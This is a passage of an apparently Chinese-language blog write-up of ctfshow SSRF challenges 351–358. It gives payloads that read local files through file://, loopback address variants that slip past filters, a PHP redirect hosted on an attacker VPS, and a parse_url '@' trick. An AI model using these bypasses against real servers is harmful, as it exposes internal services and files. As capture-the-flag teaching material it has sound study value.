<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><meta name="format-detection" content="telephone=no"><meta name="apple-mobile-web-app-capable" content="yes"><meta name="apple-mobile-web-app-status-bar-style" content="black"><link rel="icon" href="/images/icons/favicon-16x16.png?v=2.6.2" type="image/png" sizes="16x16"><link rel="icon" href="/images/icons/favicon-32x32.png?v=2.6.2" type="image/png" sizes="32x32"><meta name="description" content="&amp;#x91CD;&amp;#x65B0;&amp;#x5B66;&amp;#x4E60;ssrf&amp;#xFF0C;&amp;#x6709;&amp;#x5F88;&amp;#x591A;&amp;#x53C2;&amp;#x8003;&amp;#x6587;&amp;#x7AE0;">
<meta property="og:type" content="article">
<meta property="og:title" content="SSRF-review">
<meta property="og:url" content="http://example.com/2023/03/26/SSRF-review/index.html">
<meta property="og:site_name" content="Clutter Box">
<meta property="og:description" content="&amp;#x91CD;&amp;#x65B0;&amp;#x5B66;&amp;#x4E60;ssrf&amp;#xFF0C;&amp;#x6709;&amp;#x5F88;&amp;#x591A;&amp;#x53C2;&amp;#x8003;&amp;#x6587;&amp;#x7AE0;">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://example.com/2023/03/26/SSRF-review/SSRF-review.assets/WEBRESOURCE5f812e7429495fd161e03bf82fbc41b2.png">
<meta property="og:image" content="http://example.com/2023/03/26/SSRF-review/SSRF-review.assets/WEBRESOURCEdfe16bb6084611882bcd56fa535f9098.png">
<meta property="og:image" content="http://example.com/2023/03/26/SSRF-review/SSRF-review.assets/WEBRESOURCEf5af9d3a3e4eeb97f065511937868d81.png">
<meta property="article:published_time" content="2023-03-26T02:22:16.000Z">
<meta property="article:modified_time" content="2023-06-05T02:51:52.620Z">
<meta property="article:author" content="Kirsten Carton">
<meta property="article:tag" content="ctfshow">
<meta property="article:tag" content="ssrf">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/2023/03/26/SSRF-review/SSRF-review.assets/WEBRESOURCE5f812e7429495fd161e03bf82fbc41b2.png"><title>SSRF-review | Clutter Box</title><link ref="canonical" href="http://example.com/2023/03/26/SSRF-review/"><link rel="dns-prefetch" href="https://cdn.jsdelivr.net"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.12.1/css/all.min.css" type="text/css"><link rel="stylesheet" href="/css/index.css?v=2.6.2"><link rel="dns-prefetch" href="https://www.googletagmanager.com"><script src="https://www.googletagmanager.com/gtag/js?id=G-Q0LPD8MD2C" async=""></script><script>if (window.location.hostname !== 'localhost') {
  window.dataLayer = window.dataLayer || [];
  function gtag(){ dataLayer.push(arguments); }
  gtag('js', new Date());
  gtag('config', 'G-Q0LPD8MD2C');
}</script><script>var Stun = window.Stun || {};
var CONFIG = {
  root: '/',
  algolia: undefined,
  assistSearch: undefined,
  fontIcon: {"prompt":{"success":"fas fa-check-circle","info":"fas fa-arrow-circle-right","warning":"fas fa-exclamation-circle","error":"fas fa-times-circle"},"copyBtn":"fas fa-copy"},
  sidebar: {"offsetTop":"20px","tocMaxDepth":6},
  header: {"enable":true,"showOnPost":true,"scrollDownIcon":false},
  postWidget: {"endText":true},
  nightMode: {"enable":true},
  back2top: {"enable":true},
  codeblock: {"style":"default","highlight":"light","wordWrap":false},
  reward: false,
  fancybox: false,
  zoomImage: {"gapAside":"20px"},
  galleryWaterfall: undefined,
  lazyload: false,
  pjax: undefined,
  externalLink: {"icon":{"enable":true,"name":"fas fa-external-link-alt"}},
  shortcuts: undefined,
  prompt: {"copyButton":"Copy","copySuccess":"Copy Success","copyError":"Copy Error"},
  sourcePath: {"js":"js","css":"css","images":"images"},
};

window.CONFIG = CONFIG;</script><meta name="generator" content="Hexo 6.0.0"></head><body><div class="container" id="container"><header class="header" id="header"><div class="header-inner"><nav class="header-nav header-nav--fixed"><div class="header-nav-inner"><div class="header-nav-menubtn"><i class="fas fa-bars"></i></div><div class="header-nav-menu"><div class="header-nav-menu-item"><a class="header-nav-menu-item__link" href="/"><span class="header-nav-menu-item__icon"><i class="fas fa-home"></i></span><span class="header-nav-menu-item__text">Home</span></a></div><div class="header-nav-menu-item"><a class="header-nav-menu-item__link" href="/archives/"><span class="header-nav-menu-item__icon"><i class="fas fa-folder-open"></i></span><span class="header-nav-menu-item__text">Archives</span></a></div><div class="header-nav-menu-item"><a class="header-nav-menu-item__link" href="/categories/"><span class="header-nav-menu-item__icon"><i class="fas fa-layer-group"></i></span><span class="header-nav-menu-item__text">Categories</span></a></div><div class="header-nav-menu-item"><a class="header-nav-menu-item__link" href="/tags/"><span class="header-nav-menu-item__icon"><i class="fas fa-tags"></i></span><span class="header-nav-menu-item__text">Tags</span></a></div></div><div class="header-nav-mode"><div class="mode"><div class="mode-track"><span class="mode-track-moon"></span><span class="mode-track-sun"></span></div><div class="mode-thumb"></div></div></div></div></nav><div class="header-banner"><div class="header-banner-info"><div class="header-banner-info__title">Clutter Box</div><div class="header-banner-info__subtitle"></div></div></div></div></header><main class="main" id="main"><div class="main-inner"><div class="content-wrap" id="content-wrap"><div class="content" id="content"><!-- Just used to judge whether it is an article page--><div id="is-post"></div><div class="post"><header class="post-header"><h1 class="post-title">SSRF-review</h1><div class="post-meta"><span class="post-meta-item post-meta-item--createtime"><span class="post-meta-item__icon"><i class="far fa-calendar-plus"></i></span><span class="post-meta-item__info">Created</span><span class="post-meta-item__value">2023-03-26</span></span><span class="post-meta-item post-meta-item--updatetime"><span class="post-meta-item__icon"><i class="far fa-calendar-check"></i></span><span class="post-meta-item__info">Updated</span><span class="post-meta-item__value">2023-06-05</span></span></div></header><div class="post-body"><p>&#x91CD;&#x65B0;&#x5B66;&#x4E60;ssrf&#xFF0C;&#x6709;&#x5F88;&#x591A;&#x53C2;&#x8003;&#x6587;&#x7AE0;</p>
<span id="more"></span>

<ul>
<li>&#x6BD4;&#x8F83;&#x5168;&#x9762;&#x7684;&#xFF1A;SSRF &#x5B66;&#x4E60;&#x8BB0;&#x5F55; - HackMD</li>
<li>&#x5165;&#x95E8;&#x7B80;&#x4ECB;&#xFF1A;&#xFF08;&#x4E3E;&#x4E86;&#x4E00;&#x4E9B;&#x5B9E;&#x9645;&#x6F0F;&#x6D1E;&#x7684;&#x4F8B;&#x5B50;&#xFF09;&#x6E17;&#x900F;&#x5C0F;&#x767D;&#x770B;&#x4E86;&#x4E5F;&#x80FD;&#x660E;&#x767D;&#x7684;SSRF - FreeBuf&#x7F51;&#x7EDC;&#x5B89;&#x5168;&#x884C;&#x4E1A;&#x95E8;&#x6237;</li>
<li>&#x4E00;&#x7BC7;&#x6709;&#x601D;&#x7EF4;&#x5BFC;&#x56FE;&#x7684;&#x6587;&#x7AE0;&#xFF1A;CTF SSRF &#x6F0F;&#x6D1E;&#x4ECE;0&#x5230;1 - FreeBuf&#x7F51;&#x7EDC;&#x5B89;&#x5168;&#x884C;&#x4E1A;&#x95E8;&#x6237;</li>
<li>&#x4ECB;&#x7ECD;&#x4E86;&#x76F8;&#x5173;&#x534F;&#x8BAE;&#x7684;&#x6587;&#x7AE0;&#xFF1A;&#x4E00;&#x7BC7;&#x6587;&#x7AE0;&#x6DF1;&#x5165;&#x5B66;&#x4E60;SSRF&#x6F0F;&#x6D1E; - &#x817E;&#x8BAF;&#x4E91;&#x5F00;&#x53D1;&#x8005;&#x793E;&#x533A;-&#x817E;&#x8BAF;&#x4E91; (tencent.com)</li>
<li>2020&#x5927;&#x4F1A;&#x4E0A;&#x4ECB;&#x7ECD;&#x7684;&#x5F88;&#x6709;&#x8DA3;&#x7684;&#x653B;&#x51FB;&#x9762;&#xFF1A;SSRF&#x5B89;&#x5168;&#x6307;&#x5317; - &#x535A;&#x5BA2; - &#x817E;&#x8BAF;&#x5B89;&#x5168;&#x5E94;&#x6025;&#x54CD;&#x5E94;&#x4E2D;&#x5FC3; (tencent.com)</li>
<li>2020&#x5927;&#x4F1A;&#x7684;ppt: extension://bfdogplmndidlpjfhoijckpakkdjkkil/pdf/viewer.html?file=https%3A%2F%2F<a href="http://www.blackhat.com%2Fdocs%2Fus-17%2Fthursday%2Fus-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf">www.blackhat.com%2Fdocs%2Fus-17%2Fthursday%2Fus-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf</a></li>
<li>show&#x7684;&#x9898;&#x89E3;&#xFF1A;</li>
<li>feng&#x5E08;&#x5085;&#x7684;&#xFF1A;CTFshow-WEB&#x5165;&#x95E8;-SSRF_bfengj&#x7684;&#x535A;&#x5BA2;-CSDN&#x535A;&#x5BA2;</li>
<li>&#x7ECF;&#x5E38;&#x53C2;&#x8003;&#x7684;&#x5F88;&#x7EC6;&#x81F4;&#x7684;wp:ctfshow web&#x5165;&#x95E8; SSRF(&#x8D85;&#x8BE6;&#x89E3;)_Yn8rt&#x7684;&#x535A;&#x5BA2;-CSDN&#x535A;&#x5BA2;</li>
<li>bit&#x5E08;&#x5085;&#x7684;&#xFF1A;CTFshow&#x2014;WEB&#x5165;&#x95E8;&#x2014;&#xFF08;SSRF&#xFF09;351-360 WP - bit&#x2019;s Blog - WEB&amp;PWN (xl-bit.cn)</li>
</ul>

        <h1 id="&#x9898;&#x76EE;&#x524D;&#x7F6E;&#x77E5;&#x8BC6;">
          <a href="#&#x9898;&#x76EE;&#x524D;&#x7F6E;&#x77E5;&#x8BC6;" class="heading-link"><i class="fas fa-link"></i></a><a href="#&#x9898;&#x76EE;&#x524D;&#x7F6E;&#x77E5;&#x8BC6;" class="headerlink" title="&#x9898;&#x76EE;&#x524D;&#x7F6E;&#x77E5;&#x8BC6;"></a>&#x9898;&#x76EE;&#x524D;&#x7F6E;&#x77E5;&#x8BC6;</h1>
      <p>&#xFF08;&#x8003;&#x8651;&#x5148;&#x505A;&#x9898;&#xFF0C;&#x7136;&#x540E;&#x7531;&#x9898;&#x76EE;&#x5206;&#x7C7B;&#x7EC6;&#x5316;&#x4E00;&#x4E0B;&#x7C7B;&#x578B;&#xFF09;</p>
<p>php&#x7684;curl&#x51FD;&#x6570;&#x7684;&#x4ECB;&#x7ECD;&#xFF1A;PHP cURL &#x51FD;&#x6570; | &#x83DC;&#x9E1F;&#x6559;&#x7A0B; (runoob.com)</p>
<p>&#x8FD9;&#x4E2A;curl&#x662F;&#x4E2A;&#x5DE5;&#x5177;&#xFF0C;&#x53EF;&#x4EE5;&#x5B9E;&#x73B0;&#x670D;&#x52A1;&#x5668;&#x4E4B;&#x95F4;&#x7684;&#x6570;&#x636E;&#x6216;&#x8005;&#x6587;&#x4EF6;&#x4F20;&#x8F93;</p>
<p><img src="/2023/03/26/SSRF-review/SSRF-review.assets/WEBRESOURCE5f812e7429495fd161e03bf82fbc41b2.png"></p>
<p>&#x53EF;&#x80FD;&#x4F1A;&#x9047;&#x5230;&#x7684;&#x51FD;&#x6570;&#xFF1A;</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">//&#x521D;&#x59CB;&#x5316;&#x4E00;&#x4E2A;&#x65B0;&#x7684;&#x4F1A;&#x8BDD;</span><br><span class="line">curl_init() </span><br><span class="line">//&#x8BBE;&#x7F6E;&#x4E00;&#x4E2A;curl&#x7684;&#x4F20;&#x8F93;&#x9009;&#x9879;   $ch&#x662F;curl_init&#x8FD4;&#x56DE;&#x7684;&#x4E00;&#x4E2A;&#x53E5;&#x67C4;</span><br><span class="line">bool curl_setopt ( resource $ch , int $option , mixed $value )</span><br><span class="line">//&#x5173;&#x95ED;&#x4E00;&#x4E2A;&#x4F1A;&#x8BDD;</span><br><span class="line">curl_close()</span><br><span class="line">//&#x6267;&#x884C;&#x4E00;&#x4E2A;&#x4F1A;&#x8BDD;</span><br><span class="line">mixed curl_exec ( resource $ch )</span><br></pre></td></tr></table></div></figure>


        <h3 id="web351">
          <a href="#web351" class="heading-link"><i class="fas fa-link"></i></a><a href="#web351" class="headerlink" title="web351"></a>web351</h3>
      <p>&#x672C;&#x5730;&#x8BFB;&#x6587;&#x4EF6;</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">//POST&#x53D1;&#x5305;</span><br><span class="line">url=file:///var/www/html/flag.php</span><br></pre></td></tr></table></div></figure>


        <h3 id="web352">
          <a href="#web352" class="heading-link"><i class="fas fa-link"></i></a><a href="#web352" class="headerlink" title="web352"></a>web352</h3>
      <p>&#x4F7F;&#x7528;&#x4E86;parse_url&#x8FDB;&#x884C;url&#x7684;&#x89E3;&#x6790;&#xFF0C;&#x5C31;&#x662F;&#x628A;url&#x7684;&#x6BCF;&#x4E2A;&#x90E8;&#x5206;&#x5206;&#x89E3;&#x5230;&#x5355;&#x72EC;&#x7684;&#x6570;&#x7EC4;&#x91CC;&#x9762;&#x5B58;&#x653E;</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">//POST&#x53D1;&#x5305;</span><br><span class="line">url=http://127.0.0.1/flag.php</span><br></pre></td></tr></table></div></figure>


        <h3 id="web353">
          <a href="#web353" class="heading-link"><i class="fas fa-link"></i></a><a href="#web353" class="headerlink" title="web353"></a>web353</h3>
      <p>&#x8FC7;&#x6EE4;&#x4E86;127.0.0.1&#xFF0C;&#x4F7F;&#x7528;0.0.0.0&#x6765;&#x7ED5;&#x8FC7;</p>
<p>&#x5176;&#x4ED6;&#x4E5F;&#x6709;&#x5F88;&#x591A;&#x7ED5;&#x8FC7;&#xFF0C;&#x4F8B;&#x5982;&#x5341;&#x516D;&#x8FDB;&#x5236;&#xFF0C;&#x516B;&#x8FDB;&#x5236;&#xFF0C;&#x5341;&#x8FDB;&#x5236;&#x6574;&#x6570;&#x683C;&#x5F0F;&#xFF0C;CIDR&#x7ED5;&#x8FC7;&#x7B49;&#x7B49;</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">//POST&#x53D1;&#x5305;</span><br><span class="line">url=http://127.0.0.1/flag.php</span><br><span class="line">----</span><br><span class="line">127.0.0.1&#x7684;&#x7B49;&#x4EF7;&#x5F62;&#x5F0F;&#xFF08;&#x9664;&#x5F00;&#x8FDB;&#x5236;&#x8F6C;&#x6362;&#x5565;&#x7684;&#xFF09;</span><br><span class="line">0</span><br><span class="line">127.1</span><br><span class="line">0.0.0.0</span><br><span class="line">127.127.127.127</span><br></pre></td></tr></table></div></figure>


        <h3 id="web354">
          <a href="#web354" class="heading-link"><i class="fas fa-link"></i></a><a href="#web354" class="headerlink" title="web354"></a>web354</h3>
      <p>&#x8FC7;&#x6EE4;&#x4E86;0,1&#xFF0C;&#x7136;&#x540E;&#x6709;&#x51E0;&#x79CD;&#x65B9;&#x6CD5;&#x6765;&#x505A;</p>
<p>&#x59FF;&#x52BF;&#x4E00;&#xFF1A;&#x4F7F;&#x7528;&#x77ED;&#x57DF;&#x540D; <span class="exturl"><a class="exturl__link" target="_blank" rel="noopener" href="http://sudo.cc/">http://sudo.cc/</a><span class="exturl__icon"><i class="fas fa-external-link-alt"></i></span></span>    &#x8FD9;&#x4E2A;&#x57DF;&#x540D;&#x4F1A;&#x81EA;&#x52A8;&#x89E3;&#x6790;&#x5230;127.0.0.1&#xFF08;A&#x8BB0;&#x5F55;&#x662F;127.0.0.1&#x7684;&#x7F51;&#x7AD9;:&#xA0;<span class="exturl"><a class="exturl__link" target="_blank" rel="noopener" href="http://sudo.cc/%EF%BC%89">http://sudo.cc/&#xFF09;</a><span class="exturl__icon"><i class="fas fa-external-link-alt"></i></span></span></p>
<p>&#x59FF;&#x52BF;&#x4E8C;&#xFF1A;&#x5728;&#x81EA;&#x5DF1;&#x7684;vps&#x4E0A;&#x9762;&#x653E;&#x4E00;&#x4E2A;&#x6587;&#x4EF6;&#xFF0C;&#x7136;&#x540E;post&#x53D1;&#x5305;&#x83B7;&#x53D6;vps&#x4E0A;&#x7684;&#x8FD9;&#x4E2A;php&#x6587;&#x4EF6;&#xFF0C;&#x4ECE;&#x800C;&#x8FBE;&#x5230;&#x7ED5;&#x8FC7;&#x7684;&#x76EE;&#x7684;&#xFF0C;&#x6587;&#x4EF6;&#x5982;&#x4E0B;&#xFF1A;</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">//POST&#x53D1;&#x5305;&#xFF1A;url=http://VPS_IP/ssrf.php</span><br><span class="line">&lt;?php header(&quot;Location: http://127.0.0.1/flag.php&quot;);</span><br><span class="line"></span><br></pre></td></tr></table></div></figure>

<p>&#x59FF;&#x52BF;&#x4E09;&#xFF1A;&#x4F7F;&#x7528;yu&#x5E08;&#x5085;&#x7684;Unicode&#x7684;&#x8F6C;&#x5316;&#x65B9;&#x6CD5;&#xFF0C;&#x8FD9;&#x9898;&#x6CA1;&#x6709;&#xFF0C;&#x770B;&#x540E;&#x9762;&#x4F1A;&#x4E0D;&#x4F1A;&#x9047;&#x5230;</p>

        <h3 id="web355">
          <a href="#web355" class="heading-link"><i class="fas fa-link"></i></a><a href="#web355" class="headerlink" title="web355"></a>web355</h3>
      <p>&#x589E;&#x52A0;&#x4E86;&#x4E00;&#x4E2A;url&#x7684;&#x957F;&#x5EA6;&#x9650;&#x5236;&#xFF0C;&#x8981;&#x6C42;strlen(url) &lt; 5,&#x4F7F;&#x7528;127.1&#x53EF;&#x4EE5;&#x7ED5;&#x8FC7;</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">url=http://127.1/flag.php</span><br></pre></td></tr></table></div></figure>


        <h3 id="web356">
          <a href="#web356" class="heading-link"><i class="fas fa-link"></i></a><a href="#web356" class="headerlink" title="web356"></a>web356</h3>
      <p>&#x957F;&#x5EA6;&#x9650;&#x5236;&#x4E3A;3</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">url=http://0/flag.php</span><br></pre></td></tr></table></div></figure>


        <h3 id="web357">
          <a href="#web357" class="heading-link"><i class="fas fa-link"></i></a><a href="#web357" class="headerlink" title="web357"></a>web357</h3>
      <figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">error_reporting(0);</span><br><span class="line">highlight_file(__FILE__);</span><br><span class="line">$url=$_POST[&apos;url&apos;];</span><br><span class="line">$x=parse_url($url);</span><br><span class="line">if($x[&apos;scheme&apos;]===&apos;http&apos;||$x[&apos;scheme&apos;]===&apos;https&apos;){</span><br><span class="line">$ip = gethostbyname($x[&apos;host&apos;]);</span><br><span class="line">echo &apos;&lt;/br&gt;&apos;.$ip.&apos;&lt;/br&gt;&apos;;</span><br><span class="line">if(!filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE)) {</span><br><span class="line">    die(&apos;ip!&apos;);</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">echo file_get_contents($_POST[&apos;url&apos;]);</span><br><span class="line">}</span><br><span class="line">else{</span><br><span class="line">    die(&apos;scheme&apos;);</span><br><span class="line">}</span><br><span class="line">?&gt;</span><br><span class="line"></span><br></pre></td></tr></table></div></figure>

<p>&#x9047;&#x5230;&#x4E86;&#x4E24;&#x4E2A;&#x65B0;&#x7684;&#x51FD;&#x6570;</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">//&#x8FD4;&#x56DE;&#x7ED9;&#x5B9A;&#x57DF;/&#x4E3B;&#x673A;&#x540D;&#x7684; IPv4 &#x5730;&#x5740;</span><br><span class="line">gethostbyname(hostname)</span><br><span class="line">//&#x901A;&#x8FC7;&#x6307;&#x5B9A;&#x7684;&#x8FC7;&#x6EE4;&#x5668;&#x8FC7;&#x6EE4;&#x4E00;&#x4E2A;&#x53D8;&#x91CF;  &#x6709;&#x5F88;&#x591A;&#x5185;&#x7F6E;&#x7684;&#x53D8;&#x91CF;&#x7528;&#x4E8E;&#x8FC7;&#x6EE4;</span><br><span class="line">filter_var(var,filter,options)</span><br><span class="line"></span><br></pre></td></tr></table></div></figure>

<p>&#x8FD9;&#x6BB5;&#x7684;&#x610F;&#x601D;&#x5C31;&#x662F;&#x8BF4;&#xFF0C;&#x5148;&#x5224;&#x65AD;&#x534F;&#x8BAE;&#x662F;&#x5426;&#x662F;http&#x6216;&#x8005;https&#xFF0C;&#x7136;&#x540E;&#x8FC7;&#x6EE4;&#x4F20;&#x5165;&#x7684;&#x6570;&#x636E;&#xFF0C;&#x8981;&#x6C42;&#x4F20;&#x5165;&#x7684;&#x4E00;&#x5B9A;&#x662F;&#x4E00;&#x4E2A;&#x5408;&#x6CD5;&#x7684;ip&#x5730;&#x5740;&#xFF0C;&#x8FD9;&#x4E24;&#x4E2A;&#x5224;&#x65AD;&#x8FC7;&#x4E86;&#x4EE5;&#x540E;&#x624D;&#x4F1A;&#x6267;&#x884C;&#x540E;&#x9762;&#x7684;&#x5185;&#x5BB9;</p>
<p>&#x59FF;&#x52BF;&#x4E00;&#xFF1A;&#x4F7F;&#x7528;vps&#xFF08;302&#x8DF3;&#x8F6C;&#xFF09;</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">//POST: url=http://YOUR_IP/ssrf0326.php</span><br><span class="line"></span><br><span class="line">&lt;?php header(&quot;Location: http:/127.0.0.1/flag.php&quot;);</span><br><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></div></figure>

<p>&#x59FF;&#x52BF;&#x4E8C;&#xFF1A;&#x4F7F;&#x7528;dnslog&#x91CD;&#x7ED1;&#x5B9A;&#xFF08;&#x6316;&#x4E2A;&#x5751;&#x8FD8;&#x6CA1;&#x505A;&#xFF1A;</p>
<p>&#x3010;&#x6587;&#x7AE0;&#x3011;</p>
<p>DNS Rebinding&#x653B;&#x51FB;&#x7ED5;&#x8FC7;ssrf - B0urne &#x2018;s Blog</p>
<p>&#x6D45;&#x8C08;DNS&#x91CD;&#x7ED1;&#x5B9A;&#x6F0F;&#x6D1E; - &#x77E5;&#x4E4E; (zhihu.com)</p>
<p>&#x4F7F;&#x7528;&#x7684;&#x5DE5;&#x5177;&#x7F51;&#x7AD9;&#xFF1A; rbndr.us dns rebinding service (cmpxchg8b.com)</p>

        <h3 id="web358">
          <a href="#web358" class="heading-link"><i class="fas fa-link"></i></a><a href="#web358" class="headerlink" title="web358"></a>web358</h3>
      <p>&#x8003;&#x70B9;&#x662F;parse_url&#x7684;&#x89E3;&#x6790;&#xFF1A;parse_url&#x5C0F;&#x7ED3; - tr1ple - &#x535A;&#x5BA2;&#x56ED; (cnblogs.com)</p>
<p>&#x4EE3;&#x7801;&#x7684;&#x903B;&#x8F91;&#x662F;&#xFF1A;&#x4EE5;<span class="exturl"><a class="exturl__link" target="_blank" rel="noopener" href="http://ctf.&#x5F00;&#x5934;,&#x4EE5;show&#x7ED3;&#x5C3E;/">http://ctf.&#x5F00;&#x5934;&#xFF0C;&#x4EE5;show&#x7ED3;&#x5C3E;</a><span class="exturl__icon"><i class="fas fa-external-link-alt"></i></span></span></p>
<p>&#x5728;&#x672C;&#x5730;&#x719F;&#x6089;&#x4E00;&#x4E0B;parse_url&#xFF1A;</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line"></span><br><span class="line">$url = &apos;http://username:password@hostname/path/?arg=value#anchor&apos;;</span><br><span class="line"></span><br><span class="line">print_r(parse_url($url));</span><br><span class="line">echo parse_url($url,PHP_URL_PATH);</span><br><span class="line">------&#x8F93;&#x51FA;&#xFF1A;</span><br><span class="line">Array</span><br><span class="line">(</span><br><span class="line">    [scheme] =&gt; http  </span><br><span class="line">    [host] =&gt; hostname</span><br><span class="line">    [user] =&gt; username</span><br><span class="line">    [pass] =&gt; password</span><br><span class="line">    [path] =&gt; /path/</span><br><span class="line">    [query] =&gt; arg=value</span><br><span class="line">    [fragment] =&gt; anchor</span><br><span class="line">)</span><br><span class="line">/path/</span><br><span class="line"></span><br></pre></td></tr></table></div></figure>



<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line"></span><br><span class="line">$url = &apos;http://ctf.@127.0.0.1/flag.php#show&apos;;</span><br><span class="line"></span><br><span class="line">print_r(parse_url($url));</span><br><span class="line">echo parse_url($url,PHP_URL_PATH);</span><br><span class="line">------output&#xFF1A;</span><br><span class="line">Array</span><br><span class="line">(</span><br><span class="line">    [scheme] =&gt; http   </span><br><span class="line">    [host] =&gt; 127.0.0.1</span><br><span class="line">    [user] =&gt; ctf.      </span><br><span class="line">    [path] =&gt; /flag.php</span><br><span class="line">    [fragment] =&gt; show</span><br><span class="line">)</span><br><span class="line">/flag.php</span><br><span class="line"></span><br></pre></td></tr></table></div></figure>

<p>&#x6709;&#x51E0;&#x4E2A;&#x9700;&#x8981;&#x6CE8;&#x610F;&#x7684;&#x70B9;&#xFF1A;</p>
<ul>
<li>@&#x540E;&#x9762;&#x5462;&#x76F4;&#x63A5;&#x89E3;&#x6790;&#x6210;hostname</li>
<li>//upload?&#x4E2D;&#x7684;//&#x4F1A;&#x88AB;&#x89E3;&#x6790;&#x6210;host&#xFF0C;&#x540E;&#x9762;&#x5982;&#x679C;&#x6709;/&#x4F1A;&#x88AB;&#x89E3;&#x6790;&#x6210;path,&#x800C;&#x4E0D;&#x662F;query</li>
<li>///&#x4F1A;&#x89E3;&#x6790;&#x9519;&#x8BEF;</li>
<li>&#x4F46;&#x662F;&#x5BF9;&#x4E8E;curl&#x6765;&#x8BF4;file:///etc/passwd&#x5C31;&#x4E0D;&#x4F1A;&#x51FA;&#x9519;</li>
<li>&#x4E00;&#x822C;&#x4F7F;&#x7528;parse_url&#x89E3;&#x6790;$SERVER&#x53D8;&#x91CF;</li>
<li>&#x533A;&#x5206;parse_url&#x4E0E;libcurl&#x89E3;&#x6790;&#x533A;&#x522B;</li>
<li>parse_url&#x2013;&gt;host: &#x5339;&#x914D;&#x6700;&#x540E;&#x4E00;&#x4E2A;@&#x540E;&#x9762;&#x7B26;&#x5408;&#x683C;&#x5F0F;&#x7684;host</li>
<li>liburl&#x2013;&gt;   host: &#x5339;&#x914D;&#x7B2C;&#x4E00;&#x4E2A;@&#x540E;&#x9762;&#x7B26;&#x5408;&#x683C;&#x5F0F;&#x7684;host</li>
</ul>
<blockquote>
